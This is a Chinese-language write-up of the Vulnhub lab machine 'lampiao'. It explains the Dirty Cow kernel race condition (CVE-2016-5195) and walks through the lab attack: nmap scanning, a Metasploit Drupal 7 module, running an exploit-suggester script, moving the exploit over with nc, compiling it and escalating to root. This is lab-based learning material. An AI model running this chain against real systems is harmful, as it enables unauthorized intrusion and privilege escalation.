【Vulnhub靶机】lampiao--DirtyCow

文章目录

      • 漏洞介绍
        • 简介
        • 原因
        • 类型
        • 版本
        • 危害
      • 信息收集
        • 主机扫描
        • 端口扫描
      • 漏洞探测
      • 漏洞利用
        • 权限提升
        • nc文件传输
        • 编译
      • 参考

靶机地址:lampiao

下载地址:Lampião: 1

漏洞介绍

简介

脏牛(Dirty Cow)是Linux内核的一个提权漏洞,之所以叫Dirty Cow,Linux内核的内存子系统在处理写时拷贝(Copy-on-Write)时存在条件竞争漏洞,导致可以破坏私有只读内存映射。一个低权限的本地用户能够利用此漏洞获取其他只读内存映射的写权限,有可能进一步导致提权漏洞。竞争条件,指的是任务执行顺序异常,可导致应用崩溃,或令攻击者有机可乘,进一步执行其他代码。利用这一漏洞,攻击者可在其目标系统提升权限,甚至可能获得root权限。脏牛的CVE编号是CVE-2016-5195。

原因

很多情况下,我们希望能够并行地去处理多个相同的进程(比如我们需要去并行计算一些东西),所以内核中就存在复制进程的操作,而fork()函数就是用来复制进程的函数,它可以拷贝当前进程的内存空间,创建一个新的内存空间,这样我们就拥有了两个完全一样的进程空间。但是这个复制过程是很耗费空间和时间的,因为每个子进程都有和父进程一样大的物理空间,但是这些进程可能并不会执行写的操作,也就是不会对原始的文件进行更改,那这种浪费就是没有必要的,所以我们采取了COW(Copy On Write)技术进行优化。

COW(Copy On Write)技术是一种内存管理技术,它在进程复制时,不会立即为进程分配物理内存,而是为进程建立虚拟的内存空间,将虚拟空间指向物理空间,便于读取文件;只有当需要执行文件写操作的时候,才会复制一份物理内存空间分配给它,然后进程在这个复制完的物理内存空间中进行修改,而不会影响其他进程。换句话说,在COW机制中,当多个进程共享一个只读文件的时候,内核会把该文件的内存映射到这些进程的虚拟地址空间中,这些进程都可以读取该文件的内容,当有进程要修改文件时,就会把这个原始文件的状态改成可写状态,然后内核会将该原始文件复制一份,原始文件再改回只读状态,然后进程就修改这份副本,而原始文件仍然可以被其它进程共享,这就是Copy-on-Write的核心思想。

原始只读文件——>修改为可写状态——>复制原始只读文件——>原始状态改回可读。

但是在这个过程中,存在竞态条件。假如现在多个进程同时共享一个只读文件,那么内核可能会把这个文件复制多次,使得每个进程可以修改,但是在内核将原始只读文件的访问状态从可写改回只读之前,多个进程都可以访问和修改原始文件,导致了竞态条件的产生,如果有恶意进程在这段时间进行了修改,那么修改的就是原始文件,从而产生了漏洞。

该漏洞利用了Copy-on-Write机制中的竞态条件,攻击者可以利用这个竞态条件来获取对一个本来只读的文件的写权限,从而提升为本地管理员权限。

类型

内核竞态条件漏洞

版本

Linux kernel>2.6.22的所有Linux系统(即:从2007年发布的2.6.22开始,到2016年10月18日为止,这中间发行的所有Linux系统都受影响)

危害

本地提权


信息收集

主机扫描
 sudo arp-scan -l 

【Vulnhub靶机】lampiao--DirtyCow_第1张图片

端口扫描
sudo nmap --min-rate 10000 -p- 192.168.8.29

【Vulnhub靶机】lampiao--DirtyCow_第2张图片

详情扫描

sudo nmap -sT -sC -sV -O -p 22,80,1898  192.168.8.29

可以看到1889端口使用的是Drupal7的CMS

漏洞探测

访问80

【Vulnhub靶机】lampiao--DirtyCow_第3张图片

访问1898

【Vulnhub靶机】lampiao--DirtyCow_第4张图片

通过指纹识别插件也可以看到是Drupal 7

【Vulnhub靶机】lampiao--DirtyCow_第5张图片

漏洞利用

使用msf

search drupal 7

【Vulnhub靶机】lampiao--DirtyCow_第6张图片

use 1
show options

【Vulnhub靶机】lampiao--DirtyCow_第7张图片

显示该模块的可用选项,发现我们需要指定主机和端口

set rhosts 192.168.8.29
set rport 1898
run

【Vulnhub靶机】lampiao--DirtyCow_第8张图片

查看一下当前的用户,发现不是root用户,证明需要进行本地提权,我们将放在攻击机上的漏洞探针脚本上传到靶机

getuid

image-20231102191648342

可以使用uname -a,找到相应的版本,并查看是否可以有相关漏洞可以利用

也可以使用相关探针进行探测,这里使用linux-exploit-suggester.sh

git clone https://github.com/mzet-/linux-exploit-suggester

【Vulnhub靶机】lampiao--DirtyCow_第9张图片

上传漏洞探测脚本

upload /home/kali/tools/linux-exploit-suggester/linux-exploit-suggester.sh   /tmp/demo.sh

【Vulnhub靶机】lampiao--DirtyCow_第10张图片

文件上传成功后,使用shell命令,执行提升权限,执行探测脚本

shell
python -c "import pty;pty.spawn('/bin/bash')"
chmod +x demo.sh
./demo.sh

【Vulnhub靶机】lampiao--DirtyCow_第11张图片

执行成功后,探测出了相应的信息及漏洞,我们就发现有一个漏洞就是脏牛漏洞(CVE-2016-5195)

【Vulnhub靶机】lampiao--DirtyCow_第12张图片

【Vulnhub靶机】lampiao--DirtyCow_第13张图片

权限提升

EXP地址:https://github.com/gbonacini/CVE-2016-5195

image-20231102200508408

nc文件传输

使用nc进行文件传输

靶机上进行监听

nc -l 5064 > dcow.cpp

kali攻击机

nc 192.168.8.29 5064 < dcow.cpp

image-20231102200550971

编译

靶机上进行编译生成一个可执行文件dcow

g++ -Wall -pedantic -o2 -std=c++11 -pthread -o dcow dcow.cpp -lutil

或者直接输入 make 进行编译成可执行文件

【Vulnhub靶机】lampiao--DirtyCow_第14张图片

提权

【Vulnhub靶机】lampiao--DirtyCow_第15张图片

参考

  • https://dirtycow.ninja/
  • https://www.anquanke.com/post/id/84851

你可能感兴趣的:(#,靶机系列,靶机)